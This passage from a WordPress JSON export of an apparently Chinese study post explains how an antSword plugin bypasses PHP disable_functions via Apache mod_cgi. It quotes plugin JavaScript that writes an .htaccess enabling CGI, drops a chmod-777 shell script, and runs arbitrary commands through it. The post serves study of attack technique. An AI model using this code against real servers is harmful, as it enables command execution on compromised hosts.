data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_3cdc7bc4f86ce69123dbfc8cdaf31c3b.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_8f4607554f5dd53fe4a2732901a209d2.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_8f4607554f5dd53fe4a2732901a209d2.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u539f\u7406\u7b80\u8ff0\u4e0a<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.cnblogs.com\/one-seven\/p\/15194350.html\" title=\"\u8fd9\u4e2a\">\u8fd9\u4e2a<\/a>\u5199\u7684\u6bd4\u8f83\u6e05\u6670\uff0c\u4e0d\u518d\u8d58\u8ff0\u4e86\uff0c\u5176\u5b9e De1CTF_2020 \u7684 checkin \u5c31\u662f\u5229\u7528\u8fd9\u4e2a\u70b9\u7ed5\u8fc7\u7684<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_da776940b26d768a15881f6de4fe36b2.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2022\/11\/wp_editor_md_da776940b26d768a15881f6de4fe36b2.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u89e3\u51b3\u65b9\u6cd5\u5c31\u662f\u4e0a\u4f20\u4e00\u4e2a .htaccess \u548c\u4e00\u4e2a\u5199\u6709 shell \u7684\u811a\u672c<\/p>\n<p>\u540c\u6837\u7684\uff0c\u63d2\u4ef6\u91cc\u7684<code>index.js<\/code>\u91cc\u4e5f\u6709\u7ec6\u8282<\/p>\n<pre><code class=\"language-javascript line-numbers\">      .then(() =&gt; {\n        let expcode = {\n          _: `@copy(\".htaccess\", \".htaccess.bak\");\n@file_put_contents('.htaccess', \"Options +ExecCGI\\\\nAddHandler cgi-script .ant\");\n@file_put_contents('shell.ant', \"#!\/bin\/sh\\\\n\\\\necho&amp;ls\");\n@chmod(\"shell.ant\", 0777);`\n        };\n        self.core.request(expcode)\n          .then(() =&gt; {\n            new antSword.module.terminal(self.top.opt, {\n              exec: (arg = {\n                bin: '\/bin\/bash',\n                cmd: ''\n              }) =&gt; {\n                let content = Buffer.from(`#!${arg['bin']}\\necho&amp;&amp;${arg['cmd']}`).toString('base64');\n                let target = \"\";\n                if (self.top.opt.url.includes('127.0.0.1')) {\n                  target = `$url['scheme'].\":\/\/${self.infodata['localaddr']}\".$url['path'];`;\n                } else {\n                  target = `$url['scheme'].\":\/\/\".$_SERVER['HTTP_HOST'].$url['path'];`;\n                }\n                return {\n                  _: `@file_put_contents('shell.ant', base64_decode(\"${content}\"));\n$url=parse_url(\"${nodeurl.resolve(self.top.opt.url, 'shell.ant')}\");\n$target=${target};\necho @file_get_contents($target);`,\n                  \/\/ header(\"Location: ${nodeurl.resolve(self.top.opt.url, 'shell.ant')}\");\n                  \/\/ echo @file_get_contents(\"${nodeurl.resolve(self.top.opt.url, 'shell.ant')}\");\n                }\n              }\n            });\n          })\n          .catch(err =&gt; {\n            throw err;\n          });\n      }\n<\/code><\/pre>\n<p>\u5199\u5165<code>.htaccess<\/code>\u548c<code>shell.ant<\/code>\uff0c\u7136\u540e\u518d\u7ed9 .ant \u8d4b\u6743\uff0c\u4e0b\u9762\u53c8\u8d77\u4e86\u4e00\u4e2a\u65b0\u7684\u547d\u4ee4\u7ec8\u7aef\u6765\u5b8c\u6210\u547d\u4ee4\u6267\u884c<\/p>\n<p>\u5728\u5e95\u4e0b\u7684 refs \u91cc\u4e5f\u6709\u76f8\u5e94\u7684\u811a\u672c\uff0c\u53ef\u4ee5\u53c2\u8003\u4e0b<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/l3m0n\/Bypass_Disable_functions_Shell\/blob\/master\/exp\/apache_mod_cgi\/exp.php\" title=\"\u8fd9\u4e2a\">\u8fd9\u4e2a<\/a><\/p>","protected":false},"excerpt":{"rendered":"\u53c2\u8003\u6587\u7ae0 bypass disable_function\u591a\u79cd\u65b9\u6cd5+\u5b9e\u4f8b bypass_disablefunc_ [&hellip;]","protected":false},"author":1,"featured_media":479,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[32,26],"tags":[33],"class_list":["post-475","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-antsword","category-study","tag-antsword"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2022\/11\/1.webp?fit=720%2C388","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/475","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=475"}],"version-history":[{"count":20,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/475\/revisions"}],"predecessor-version":[{"id":499,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/475\/revisions\/499"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/479"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=475"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}